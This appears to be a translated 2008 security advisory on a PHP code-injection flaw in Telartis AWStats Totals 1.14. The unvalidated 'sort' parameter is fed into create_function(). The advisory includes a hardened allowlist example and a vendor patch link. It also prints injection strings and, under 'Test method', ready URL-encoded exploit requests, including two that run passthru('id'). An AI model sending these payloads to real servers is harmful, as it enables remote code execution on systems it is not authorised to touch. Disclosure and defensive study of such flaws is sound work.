Release date: 2008-08-26
Update date: 2008-08-27
Affected systems:
Telartis AWStats Totals 1.14
Unaffected systems:
Telartis AWStats Totals 1.15
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 30856
AWStats Totals is a simple PHP script for viewing totals across the configurations of the AWStats log analysis tool.
AWStats Totals takes three URL parameters, month, year and sort, and uses them without any validity check. The script uses the sort parameter to build an anonymous PHP function through create_function():
> function multisort(&$array, $key) {
>     $cmp = create_function('$a, $b',
>         'if ($a["'.$key.'"] == $b["'.$key.'"]) return 0; '.
>         'return ($a["'.$key.'"] > $b["'.$key.'"]) ? -1 : 1;');
>     usort($array, $cmp);
> }
>
> if ($sort == 'config') sort($rows); else multisort($rows, $sort);
By carefully matching the quotation marks and brackets, a PHP expression can be injected into the generated function code. For example, to call the phpinfo() function, the following sort value could be supplied:
"].phpinfo().$a["
Because the injected code would otherwise be executed many times, exit() can be appended so the script terminates after a single call:
"].phpinfo().exit().$a["
Variable expansion inside strings in newer PHP versions can also be used to inject a PHP expression:
{${phpinfo()}}{${exit()}}
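As an added example (not AWStats Totals' own code, and not the vendor's 1.15 fix), a hardened replacement for the multisort() above: the sort parameter is checked against an allowlist before it is used, and the comparator is an ordinary closure rather than code compiled from a string, so the value can only ever act as an array index. The column names in $ALLOWED_SORT_KEYS and the sample rows are assumed for illustration.

```php
<?php
// Allowlist of sortable columns (assumed names; a real deployment lists its actual row fields).
$ALLOWED_SORT_KEYS = ['config', 'unique', 'visits', 'pages', 'hits', 'bandwidth'];

// Validate untrusted input against the allowlist before it reaches any sorting logic.
// Anything not on the list falls back to a safe default instead of being interpolated.
function validate_sort_key(string $sort, array $allowed): string {
    if (!in_array($sort, $allowed, true)) {
        return 'config';
    }
    return $sort;
}

// Sort rows by a key using a closure. No string is ever turned into code here,
// so a hostile $key can at worst select a missing array index, never run code.
function multisort_safe(array &$rows, string $key): void {
    usort($rows, function (array $a, array $b) use ($key): int {
        return $b[$key] <=> $a[$key];   // descending, as in the original comparator
    });
}

// Constructed sample data standing in for AWStats Totals rows.
$rows = [
    ['config' => 'siteA', 'visits' => 120, 'pages' => 900],
    ['config' => 'siteB', 'visits' => 340, 'pages' => 400],
    ['config' => 'siteC', 'visits' => 80,  'pages' => 1200],
];

// A sort value like the advisory's payload is rejected and replaced by the default.
$sort = validate_sort_key($_GET['sort'] ?? 'config', $ALLOWED_SORT_KEYS);

if ($sort === 'config') {
    sort($rows);
} else {
    multisort_safe($rows, $sort);
}

foreach ($rows as $row) {
    echo $row['config'], "\t", $row['visits'], "\t", $row['pages'], "\n";
}
```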
<* Source: Elliot Kendall (ekendall@brandeis.edu)
Link: http://marc.info/?l=bugtraq&m=121977666015052&w=2
http://secunia.com/advisories/31630/
*>
Test method:
--------------------------------------------------------------------------------
Warning
The following procedures (methods) may be offensive in nature and are provided only for security research and teaching purposes. Use at your own risk!
http://host.tld/some/path/awstatstotals.php?sort=%22%5d%2ephpinfo%28%29%2eexit%28%29%2e%24a%5b%22
http://host.tld/some/path/awstatstotals.php?sort=%22%5d%2epassthru%28%27id%27%29%2eexit%28%29%2e%24a%5b%22
http://host.tld/some/path/awstatstotals.php?sort=%7b%24%7bphpinfo%28%29%7d%7d%7b%24%7bexit%28%29%7d%7d
http://host.tld/some/path/awstatstotals.php?sort=%7b%24%7bpassthru%28chr(105)%2echr(100)%29%7d%7d%7b%24%7bexit%28%29%7d%7d
Recommendation:
--------------------------------------------------------------------------------
Vendor patch:
Telartis
--------
The vendor has already released a patch that fixes this security issue; please download it from the vendor's home page:
http://www.telartis.nl/xcms/awstats/